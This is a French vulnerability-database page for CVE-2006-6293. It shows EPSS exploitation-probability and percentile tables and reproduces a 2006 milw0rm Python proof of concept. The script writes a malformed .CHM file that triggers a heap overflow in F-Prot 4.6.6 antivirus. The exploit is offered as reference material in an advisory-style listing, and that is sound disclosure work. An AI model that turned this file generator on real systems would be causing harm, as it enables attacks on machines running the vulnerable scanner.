CVE-2006-6293 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	40.59%	–	–
2022-02-13	–	–	40.59%	–	–
2023-03-12	–	–	–	54.95%	–
2023-07-30	–	–	–	54.46%	–
2023-09-03	–	–	–	54.09%	–
2023-12-24	–	–	–	61.41%	–
2024-03-10	–	–	–	60.96%	–
2024-06-02	–	–	–	60.96%	–
2024-12-22	–	–	–	55%	–
2025-01-19	–	–	–	55%	–
2025-03-18	–	–	–	–	12.62%
2025-04-08	–	–	–	–	9.92%
2025-04-08	–	–	–	–	9.92,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	97%
2022-02-13	98%
2023-03-12	97%
2023-07-30	97%
2023-09-03	97%
2023-12-24	98%
2024-03-10	98%
2024-06-02	98%
2024-12-22	98%
2025-01-19	98%
2025-03-18	93%
2025-04-08	92%
2025-04-08	92%

# fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap # overflow # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # # $ ./fprot2.py > 1.chm # $ f-prot 1.chm import sys import struct s="" s+="ITSF" # signature s+=struct.pack("<L",3) # version s+=struct.pack("<L",96) # header_len s+=struct.pack("<L",1) # unknown s+=struct.pack("<L",0x41424344) # last_modified s+=struct.pack("<L",0x419) # lang_id s+="A"*16 #dir_clsid s+="B"*16 #stream_clsid s+=struct.pack("<L",96) + "\x00" * 4 #sec0_offset s+=struct.pack("<L",24) + "\x00" * 4 #sec0_len s+=struct.pack("<L",120) + "\x00" *4 #dir_offset s+=struct.pack("<L",4180) + "\x00" * 4 #dir_len s+=struct.pack("<L",4300) + "\x00"*4 #data_offset s+="A"*24 s+="ITSP" s+=struct.pack("<L", 1) # version s+=struct.pack("<L",0x54) # header_len s+=struct.pack("<L", 0xa) # unknown s+=struct.pack("<L",1000) # block_len - BUG? s+=struct.pack("<L",2) # blockidx s+=struct.pack("<L", 1) # index_depth s+=struct.pack("<L", -1) # index_root s+=struct.pack("<L",0) # index_head s+=struct.pack("<L",0) # index_tail s+=struct.pack("<L", -1) # unknown2 s+=struct.pack("<L",1) # num_blocks s+=struct.pack("<L", 1033) # lang_id s+="A"*32 s+="B"*10000 sys.stdout.write(s) # milw0rm.com [2006-12-04]